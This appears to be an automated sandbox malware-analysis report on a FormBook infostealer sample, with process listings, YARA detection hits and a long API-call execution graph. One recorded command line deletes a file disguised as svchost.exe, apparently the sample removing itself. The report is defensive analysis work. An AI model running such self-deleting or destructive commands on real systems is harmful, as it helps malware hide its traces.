                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                    Start time:07:57:00
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\autoconv.exe"
                                                                                                                                                                                                                                                    Imagebase:0xad0000
                                                                                                                                                                                                                                                    File size:842'752 bytes
                                                                                                                                                                                                                                                    MD5 hash:A705C2ACED7DDB71AFB87C4ED384BED6
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                    Start time:07:57:00
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                                                                                                                                                                                                                                    Imagebase:0xdd0000
                                                                                                                                                                                                                                                    File size:78'336 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                    Start time:07:57:03
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                    Start time:07:57:03
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                    Start time:07:58:38
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640
                                                                                                                                                                                                                                                    Imagebase:0x7ff637350000
                                                                                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                    Start time:07:58:40
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:explorer.exe
                                                                                                                                                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:4%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                                                      Signature Coverage:3.7%
                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                      Total number of Limit Nodes:158
                                                                                                                                                                                                                                                      execution_graph 92412 ee5dfd 92413 ee5e09 __freefls@4 92412->92413 92449 ee7eeb GetStartupInfoW 92413->92449 92415 ee5e0e 92451 ee9ca7 GetProcessHeap 92415->92451 92417 ee5e66 92418 ee5e71 92417->92418 92536 ee5f4d 47 API calls 3 library calls 92417->92536 92452 ee7b47 92418->92452 92421 ee5e77 92422 ee5e82 __RTC_Initialize 92421->92422 92537 ee5f4d 47 API calls 3 library calls 92421->92537 92473 eeacb3 92422->92473 92425 ee5e91 92426 ee5e9d GetCommandLineW 92425->92426 92538 ee5f4d 47 API calls 3 library calls 92425->92538 92492 ef2e7d GetEnvironmentStringsW 92426->92492 92429 ee5e9c 92429->92426 92433 ee5ec2 92505 ef2cb4 92433->92505 92436 ee5ec8 92437 ee5ed3 92436->92437 92540 ee115b 47 API calls 3 library calls 92436->92540 92519 ee1195 92437->92519 92440 ee5edb 92441 ee5ee6 __wwincmdln 92440->92441 92541 ee115b 47 API calls 3 library calls 92440->92541 92523 ec3a0f 92441->92523 92444 ee5efa 92445 ee5f09 92444->92445 92542 ee13f1 47 API calls _doexit 92444->92542 92543 ee1186 47 API calls _doexit 92445->92543 92448 ee5f0e __freefls@4 92450 ee7f01 92449->92450 92450->92415 92451->92417 92544 ee123a 30 API calls 2 library calls 92452->92544 92454 ee7b4c 92545 ee7e23 InitializeCriticalSectionAndSpinCount 92454->92545 92456 ee7b51 92457 ee7b55 92456->92457 92547 ee7e6d TlsAlloc 92456->92547 92546 ee7bbd 50 API calls 2 library calls 92457->92546 92460 ee7b5a 92460->92421 92461 ee7b67 92461->92457 92462 ee7b72 92461->92462 92548 ee6986 92462->92548 92465 ee7bb4 92556 ee7bbd 50 API calls 2 library calls 92465->92556 92468 ee7bb9 92468->92421 92469 ee7b93 92469->92465 92470 ee7b99 92469->92470 92555 ee7a94 47 API calls 4 library calls 92470->92555 92472 ee7ba1 GetCurrentThreadId 92472->92421 92474 eeacbf __freefls@4 92473->92474 92565 ee7cf4 92474->92565 92476 eeacc6 92477 ee6986 __calloc_crt 47 API calls 92476->92477 92479 eeacd7 92477->92479 92478 eead42 GetStartupInfoW 92487 eeae80 92478->92487 92489 eead57 92478->92489 92479->92478 92480 eeace2 @_EH4_CallFilterFunc@8 __freefls@4 92479->92480 92480->92425 92481 eeaf44 92572 eeaf58 LeaveCriticalSection _doexit 92481->92572 92483 eeaec9 GetStdHandle 92483->92487 92484 eeada5 92484->92487 92490 eeadd7 GetFileType 92484->92490 92491 eeade5 InitializeCriticalSectionAndSpinCount 92484->92491 92485 ee6986 __calloc_crt 47 API calls 92485->92489 92486 eeaedb GetFileType 92486->92487 92487->92481 92487->92483 92487->92486 92488 eeaf08 InitializeCriticalSectionAndSpinCount 92487->92488 92488->92487 92489->92484 92489->92485 92489->92487 92490->92484 92490->92491 92491->92484 92493 ef2e8e 92492->92493 92494 ee5ead 92492->92494 92611 ee69d0 47 API calls _W_store_winword 92493->92611 92499 ef2a7b GetModuleFileNameW 92494->92499 92497 ef2eb4 ___crtGetEnvironmentStringsW 92498 ef2eca FreeEnvironmentStringsW 92497->92498 92498->92494 92500 ef2aaf _wparse_cmdline 92499->92500 92501 ee5eb7 92500->92501 92502 ef2ae9 92500->92502 92501->92433 92539 ee115b 47 API calls 3 library calls 92501->92539 92612 ee69d0 47 API calls _W_store_winword 92502->92612 92504 ef2aef _wparse_cmdline 92504->92501 92506 ef2ccd __NMSG_WRITE 92505->92506 92510 ef2cc5 92505->92510 92507 ee6986 __calloc_crt 47 API calls 92506->92507 92515 ef2cf6 __NMSG_WRITE 92507->92515 92508 ef2d4d 92509 ee1c9d _free 47 API calls 92508->92509 92509->92510 92510->92436 92511 ee6986 __calloc_crt 47 API calls 92511->92515 92512 ef2d72 92513 ee1c9d _free 47 API calls 92512->92513 92513->92510 92515->92508 92515->92510 92515->92511 92515->92512 92516 ef2d89 92515->92516 92613 ef2567 47 API calls 2 library calls 92515->92613 92614 ee6e20 IsProcessorFeaturePresent 92516->92614 92518 ef2d95 92518->92436 92520 ee11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 92519->92520 92522 ee11e0 __IsNonwritableInCurrentImage 92520->92522 92637 ee0f0a 52 API calls __cinit 92520->92637 92522->92440 92524 ec3a29 92523->92524 92525 f31ebf 92523->92525 92526 ec3a63 IsThemeActive 92524->92526 92638 ee1405 92526->92638 92530 ec3a8f 92650 ec3adb SystemParametersInfoW SystemParametersInfoW 92530->92650 92532 ec3a9b 92651 ec3d19 92532->92651 92534 ec3aa3 SystemParametersInfoW 92535 ec3ac8 92534->92535 92535->92444 92536->92418 92537->92422 92538->92429 92542->92445 92543->92448 92544->92454 92545->92456 92546->92460 92547->92461 92550 ee698d 92548->92550 92551 ee69ca 92550->92551 92552 ee69ab Sleep 92550->92552 92557 ef30aa 92550->92557 92551->92465 92554 ee7ec9 TlsSetValue 92551->92554 92553 ee69c2 92552->92553 92553->92550 92553->92551 92554->92469 92555->92472 92556->92468 92558 ef30b5 92557->92558 92563 ef30d0 __calloc_impl 92557->92563 92559 ef30c1 92558->92559 92558->92563 92564 ee7c0e 47 API calls __getptd_noexit 92559->92564 92561 ef30e0 RtlAllocateHeap 92562 ef30c6 92561->92562 92561->92563 92562->92550 92563->92561 92563->92562 92564->92562 92566 ee7d18 EnterCriticalSection 92565->92566 92567 ee7d05 92565->92567 92566->92476 92573 ee7d7c 92567->92573 92569 ee7d0b 92569->92566 92597 ee115b 47 API calls 3 library calls 92569->92597 92572->92480 92574 ee7d88 __freefls@4 92573->92574 92575 ee7da9 92574->92575 92576 ee7d91 92574->92576 92577 ee7da7 92575->92577 92583 ee7e11 __freefls@4 92575->92583 92598 ee81c2 47 API calls __NMSG_WRITE 92576->92598 92577->92575 92601 ee69d0 47 API calls _W_store_winword 92577->92601 92580 ee7d96 92599 ee821f 47 API calls 5 library calls 92580->92599 92581 ee7dbd 92584 ee7dc4 92581->92584 92585 ee7dd3 92581->92585 92583->92569 92602 ee7c0e 47 API calls __getptd_noexit 92584->92602 92588 ee7cf4 __lock 46 API calls 92585->92588 92586 ee7d9d 92600 ee1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92586->92600 92591 ee7dda 92588->92591 92590 ee7dc9 92590->92583 92592 ee7dfe 92591->92592 92593 ee7de9 InitializeCriticalSectionAndSpinCount 92591->92593 92603 ee1c9d 92592->92603 92594 ee7e04 92593->92594 92609 ee7e1a LeaveCriticalSection _doexit 92594->92609 92598->92580 92599->92586 92601->92581 92602->92590 92604 ee1ca6 RtlFreeHeap 92603->92604 92605 ee1ccf _free 92603->92605 92604->92605 92606 ee1cbb 92604->92606 92605->92594 92610 ee7c0e 47 API calls __getptd_noexit 92606->92610 92608 ee1cc1 GetLastError 92608->92605 92609->92583 92610->92608 92611->92497 92612->92504 92613->92515 92615 ee6e2b 92614->92615 92620 ee6cb5 92615->92620 92619 ee6e46 92619->92518 92621 ee6ccf _memset __call_reportfault 92620->92621 92622 ee6cef IsDebuggerPresent 92621->92622 92628 ee81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 92622->92628 92625 ee6db3 __call_reportfault 92629 eea70c 92625->92629 92626 ee6dd6 92627 ee8197 GetCurrentProcess TerminateProcess 92626->92627 92627->92619 92628->92625 92630 eea716 IsProcessorFeaturePresent 92629->92630 92631 eea714 92629->92631 92633 ef37b0 92630->92633 92631->92626 92636 ef375f 5 API calls 2 library calls 92633->92636 92635 ef3893 92635->92626 92636->92635 92637->92522 92639 ee7cf4 __lock 47 API calls 92638->92639 92640 ee1410 92639->92640 92703 ee7e58 LeaveCriticalSection 92640->92703 92642 ec3a88 92643 ee146d 92642->92643 92644 ee1477 92643->92644 92645 ee1491 92643->92645 92644->92645 92704 ee7c0e 47 API calls __getptd_noexit 92644->92704 92645->92530 92647 ee1481 92705 ee6e10 8 API calls __gmtime64_s 92647->92705 92649 ee148c 92649->92530 92650->92532 92652 ec3d26 __ftell_nolock 92651->92652 92706 ecd7f7 92652->92706 92656 ec3d57 IsDebuggerPresent 92657 f31cc1 MessageBoxA 92656->92657 92658 ec3d65 92656->92658 92659 f31cd9 92657->92659 92658->92659 92660 ec3d82 92658->92660 92689 ec3e3a 92658->92689 92908 edc682 48 API calls 92659->92908 92785 ec40e5 92660->92785 92661 ec3e41 SetCurrentDirectoryW 92665 ec3e4e Mailbox 92661->92665 92665->92534 92666 ec3da0 GetFullPathNameW 92801 ec6a63 92666->92801 92667 f31ce9 92670 f31cff SetCurrentDirectoryW 92667->92670 92669 ec3ddb 92812 ec6430 92669->92812 92670->92665 92673 ec3df6 92674 ec3e00 92673->92674 92909 f071fa AllocateAndInitializeSid CheckTokenMembership FreeSid 92673->92909 92828 ec3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 92674->92828 92677 f31d1c 92677->92674 92680 f31d2d 92677->92680 92910 ec5374 92680->92910 92681 ec3e0a 92683 ec3e1f 92681->92683 92836 ec4ffc 92681->92836 92846 ece8d0 92683->92846 92685 f31d35 92917 ecce19 92685->92917 92689->92661 92690 f31d42 92692 f31d49 92690->92692 92693 f31d6e 92690->92693 92923 ec518c 92692->92923 92695 ec518c 48 API calls 92693->92695 92697 f31d6a GetForegroundWindow ShellExecuteW 92695->92697 92701 f31d9e Mailbox 92697->92701 92701->92689 92703->92642 92704->92647 92705->92649 92934 edf4ea 92706->92934 92708 ecd818 92709 edf4ea 48 API calls 92708->92709 92710 ec3d31 GetCurrentDirectoryW 92709->92710 92711 ec61ca 92710->92711 92965 ede99b 92711->92965 92715 ec61eb 92716 ec5374 50 API calls 92715->92716 92717 ec61ff 92716->92717 92718 ecce19 48 API calls 92717->92718 92719 ec620c 92718->92719 92982 ec39db 92719->92982 92721 ec6216 Mailbox 92994 ec6eed 92721->92994 92726 ecce19 48 API calls 92727 ec6244 92726->92727 93001 ecd6e9 92727->93001 92729 ec6254 Mailbox 92730 ecce19 48 API calls 92729->92730 92731 ec627c 92730->92731 92732 ecd6e9 55 API calls 92731->92732 92733 ec628f Mailbox 92732->92733 92734 ecce19 48 API calls 92733->92734 92735 ec62a0 92734->92735 93005 ecd645 92735->93005 92737 ec62b2 Mailbox 92738 ecd7f7 48 API calls 92737->92738 92739 ec62c5 92738->92739 93015 ec63fc 92739->93015 92743 ec62df 92744 ec62e9 92743->92744 92745 f31c08 92743->92745 92746 ee0fa7 _W_store_winword 59 API calls 92744->92746 92747 ec63fc 48 API calls 92745->92747 92748 ec62f4 92746->92748 92749 f31c1c 92747->92749 92748->92749 92750 ec62fe 92748->92750 92752 ec63fc 48 API calls 92749->92752 92751 ee0fa7 _W_store_winword 59 API calls 92750->92751 92753 ec6309 92751->92753 92754 f31c38 92752->92754 92753->92754 92755 ec6313 92753->92755 92756 ec5374 50 API calls 92754->92756 92757 ee0fa7 _W_store_winword 59 API calls 92755->92757 92758 f31c5d 92756->92758 92759 ec631e 92757->92759 92760 ec63fc 48 API calls 92758->92760 92761 ec635f 92759->92761 92763 f31c86 92759->92763 92766 ec63fc 48 API calls 92759->92766 92764 f31c69 92760->92764 92762 ec636c 92761->92762 92761->92763 93031 edc050 92762->93031 92767 ec6eed 48 API calls 92763->92767 92765 ec6eed 48 API calls 92764->92765 92769 f31c77 92765->92769 92770 ec6342 92766->92770 92771 f31ca8 92767->92771 92773 ec63fc 48 API calls 92769->92773 92774 ec6eed 48 API calls 92770->92774 92775 ec63fc 48 API calls 92771->92775 92772 ec6384 93042 ed1b90 92772->93042 92773->92763 92777 ec6350 92774->92777 92778 f31cb5 92775->92778 92779 ec63fc 48 API calls 92777->92779 92778->92778 92779->92761 92780 ed1b90 48 API calls 92782 ec6394 92780->92782 92782->92780 92783 ec63fc 48 API calls 92782->92783 92784 ec63d6 Mailbox 92782->92784 93058 ec6b68 48 API calls 92782->93058 92783->92782 92784->92656 92786 ec40f2 __ftell_nolock 92785->92786 92787 ec410b 92786->92787 92788 f3370e _memset 92786->92788 93717 ec660f 92787->93717 92790 f3372a GetOpenFileNameW 92788->92790 92792 f33779 92790->92792 92794 ec6a63 48 API calls 92792->92794 92796 f3378e 92794->92796 92796->92796 92798 ec4129 93742 ec4139 92798->93742 92802 ec6adf 92801->92802 92804 ec6a6f __NMSG_WRITE 92801->92804 92803 ecb18b 48 API calls 92802->92803 92811 ec6ab6 ___crtGetEnvironmentStringsW 92803->92811 92805 ec6a8b 92804->92805 92806 ec6ad7 92804->92806 94013 ec6b4a 92805->94013 94016 ecc369 48 API calls 92806->94016 92809 ec6a95 92810 edee75 48 API calls 92809->92810 92810->92811 92811->92669 92813 ec643d __ftell_nolock 92812->92813 94017 ec4c75 92813->94017 92815 ec6442 92827 ec3dee 92815->92827 94028 ec5928 86 API calls 92815->94028 92817 ec644f 92817->92827 94029 ec5798 88 API calls Mailbox 92817->94029 92819 ec6458 92820 ec645c GetFullPathNameW 92819->92820 92819->92827 92821 ec6a63 48 API calls 92820->92821 92822 ec6488 92821->92822 92823 ec6a63 48 API calls 92822->92823 92824 ec6495 92823->92824 92825 f35dcf _wcscat 92824->92825 92826 ec6a63 48 API calls 92824->92826 92826->92827 92827->92667 92827->92673 92829 ec3ed8 92828->92829 92830 f31cba 92828->92830 94080 ec4024 92829->94080 92834 ec3e05 92835 ec36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 92834->92835 92835->92681 92837 ec5027 _memset 92836->92837 94085 ec4c30 92837->94085 92840 ec50ac 92842 ec50ca Shell_NotifyIconW 92840->92842 92843 f33d28 Shell_NotifyIconW 92840->92843 94089 ec51af 92842->94089 92845 ec50df 92845->92683 92847 ece8f6 92846->92847 92906 ece906 Mailbox 92846->92906 92848 eced52 92847->92848 92847->92906 94201 ede3cd 335 API calls 92848->94201 92850 ec3e2a 92850->92689 92907 ec3847 Shell_NotifyIconW _memset 92850->92907 92852 eced63 92852->92850 92854 eced70 92852->92854 92853 ece94c PeekMessageW 92853->92906 94203 ede312 335 API calls Mailbox 92854->94203 92856 f3526e Sleep 92856->92906 92857 eced77 LockWindowUpdate DestroyWindow GetMessageW 92857->92850 92860 eceda9 92857->92860 92858 ecebc7 92858->92850 94202 ec2ff6 16 API calls 92858->94202 92861 f359ef TranslateMessage DispatchMessageW GetMessageW 92860->92861 92861->92861 92864 f35a1f 92861->92864 92863 ec1caa 49 API calls 92863->92906 92864->92850 92865 eced21 PeekMessageW 92865->92906 92867 edf4ea 48 API calls 92867->92906 92868 ecebf7 timeGetTime 92868->92906 92869 ec6eed 48 API calls 92869->92906 92870 eced3a TranslateMessage DispatchMessageW 92870->92865 92871 f35557 WaitForSingleObject 92874 f35574 GetExitCodeProcess CloseHandle 92871->92874 92871->92906 92872 ecd7f7 48 API calls 92898 f35429 Mailbox 92872->92898 92873 f3588f Sleep 92873->92898 92874->92906 92875 ecedae timeGetTime 94204 ec1caa 49 API calls 92875->94204 92878 f35733 Sleep 92878->92898 92880 ec2aae 311 API calls 92880->92906 92882 eddc38 timeGetTime 92882->92898 92883 f35926 GetExitCodeProcess 92885 f35952 CloseHandle 92883->92885 92886 f3593c WaitForSingleObject 92883->92886 92884 f35445 Sleep 92884->92906 92885->92898 92886->92885 92886->92906 92887 f35432 Sleep 92887->92884 92888 f28c4b 108 API calls 92888->92898 92889 ec2c79 107 API calls 92889->92898 92891 f359ae Sleep 92891->92906 92894 ecce19 48 API calls 92894->92898 92896 ecd6e9 55 API calls 92896->92898 92898->92872 92898->92882 92898->92883 92898->92884 92898->92887 92898->92888 92898->92889 92898->92891 92898->92894 92898->92896 92898->92906 94206 f04cbe 49 API calls Mailbox 92898->94206 94207 ec1caa 49 API calls 92898->94207 94208 ec2aae 335 API calls 92898->94208 94238 f1ccb2 50 API calls 92898->94238 94239 f07a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 92898->94239 94240 f06532 63 API calls 3 library calls 92898->94240 92903 ecd6e9 55 API calls 92903->92906 92904 f0cc5c 86 API calls 92904->92906 92905 ecce19 48 API calls 92905->92906 92906->92853 92906->92856 92906->92858 92906->92863 92906->92865 92906->92867 92906->92868 92906->92869 92906->92870 92906->92871 92906->92873 92906->92875 92906->92878 92906->92880 92906->92884 92906->92898 92906->92903 92906->92904 92906->92905 94114 ecf110 92906->94114 94179 ed45e0 92906->94179 94196 eceed0 335 API calls Mailbox 92906->94196 94197 ecef00 335 API calls 92906->94197 94198 ed3200 335 API calls 2 library calls 92906->94198 94199 ede244 TranslateAcceleratorW 92906->94199 94200 eddc5f IsDialogMessageW GetClassLongW 92906->94200 94205 f28d23 48 API calls 92906->94205 94209 ecfe30 92906->94209 92907->92689 92908->92667 92909->92677 92911 eef8a0 __ftell_nolock 92910->92911 92912 ec5381 GetModuleFileNameW 92911->92912 92913 ecce19 48 API calls 92912->92913 92914 ec53a7 92913->92914 92915 ec660f 49 API calls 92914->92915 92916 ec53b1 Mailbox 92915->92916 92916->92685 92918 ecce28 __NMSG_WRITE 92917->92918 92919 edee75 48 API calls 92918->92919 92920 ecce50 ___crtGetEnvironmentStringsW 92919->92920 92921 edf4ea 48 API calls 92920->92921 92922 ecce66 92921->92922 92922->92690 92924 ec5197 92923->92924 92925 ec519f 92924->92925 92926 f31ace 92924->92926 92937 edf4f2 __calloc_impl 92934->92937 92936 edf50c 92936->92708 92937->92936 92938 edf50e std::exception::exception 92937->92938 92943 ee395c 92937->92943 92957 ee6805 RaiseException 92938->92957 92940 edf538 92958 ee673b 47 API calls _free 92940->92958 92942 edf54a 92942->92708 92944 ee39d7 __calloc_impl 92943->92944 92949 ee3968 __calloc_impl 92943->92949 92964 ee7c0e 47 API calls __getptd_noexit 92944->92964 92947 ee399b RtlAllocateHeap 92947->92949 92956 ee39cf 92947->92956 92949->92947 92950 ee3973 92949->92950 92951 ee39c3 92949->92951 92954 ee39c1 92949->92954 92950->92949 92959 ee81c2 47 API calls __NMSG_WRITE 92950->92959 92960 ee821f 47 API calls 5 library calls 92950->92960 92961 ee1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92950->92961 92962 ee7c0e 47 API calls __getptd_noexit 92951->92962 92963 ee7c0e 47 API calls __getptd_noexit 92954->92963 92956->92937 92957->92940 92958->92942 92959->92950 92960->92950 92962->92954 92963->92956 92964->92956 92966 ecd7f7 48 API calls 92965->92966 92967 ec61db 92966->92967 92968 ec6009 92967->92968 92969 ec6016 __ftell_nolock 92968->92969 92970 ec6a63 48 API calls 92969->92970 92975 ec617c Mailbox 92969->92975 92972 ec6048 92970->92972 92980 ec607e Mailbox 92972->92980 93059 ec61a6 92972->93059 92973 ec61a6 48 API calls 92973->92980 92974 ec614f 92974->92975 92976 ecce19 48 API calls 92974->92976 92975->92715 92978 ec6170 92976->92978 92977 ecce19 48 API calls 92977->92980 92979 ec64cf 48 API calls 92978->92979 92979->92975 92980->92973 92980->92974 92980->92975 92980->92977 93062 ec64cf 92980->93062 93085 ec41a9 92982->93085 92985 ec3a06 92985->92721 92988 f32ff0 92990 ee1c9d _free 47 API calls 92988->92990 92991 f32ffd 92990->92991 92992 ec4252 84 API calls 92991->92992 92993 f33006 92992->92993 92993->92993 92995 ec6ef8 92994->92995 92996 ec622b 92994->92996 93705 ecdd47 48 API calls ___crtGetEnvironmentStringsW 92995->93705 92998 ec9048 92996->92998 92999 edf4ea 48 API calls 92998->92999 93000 ec6237 92999->93000 93000->92726 93002 ecd6f4 93001->93002 93003 ecd71b 93002->93003 93706 ecd764 55 API calls 93002->93706 93003->92729 93006 ecd654 93005->93006 93013 ecd67e 93005->93013 93007 ecd65b 93006->93007 93010 ecd6c2 93006->93010 93008 ecd666 93007->93008 93014 ecd6ab 93007->93014 93707 ecd9a0 53 API calls __cinit 93008->93707 93010->93014 93709 eddce0 53 API calls 93010->93709 93013->92737 93014->93013 93708 eddce0 53 API calls 93014->93708 93016 ec641f 93015->93016 93017 ec6406 93015->93017 93018 ec6a63 48 API calls 93016->93018 93019 ec6eed 48 API calls 93017->93019 93020 ec62d1 93018->93020 93019->93020 93021 ee0fa7 93020->93021 93022 ee1028 93021->93022 93023 ee0fb3 93021->93023 93712 ee103a 59 API calls 4 library calls 93022->93712 93030 ee0fd8 93023->93030 93710 ee7c0e 47 API calls __getptd_noexit 93023->93710 93025 ee1035 93025->92743 93027 ee0fbf 93711 ee6e10 8 API calls __gmtime64_s 93027->93711 93029 ee0fca 93029->92743 93030->92743 93032 edc064 93031->93032 93034 edc069 Mailbox 93031->93034 93713 edc1af 48 API calls 93032->93713 93039 edc077 93034->93039 93714 edc15c 48 API calls 93034->93714 93036 edf4ea 48 API calls 93038 edc108 93036->93038 93037 edc152 93037->92772 93040 edf4ea 48 API calls 93038->93040 93039->93036 93039->93037 93041 edc113 93040->93041 93041->92772 93041->93041 93043 ed1cf6 93042->93043 93045 ed1ba2 93042->93045 93043->92782 93044 ed1c5d 93044->92782 93048 edf4ea 48 API calls 93045->93048 93057 ed1bae 93045->93057 93047 ed1bb9 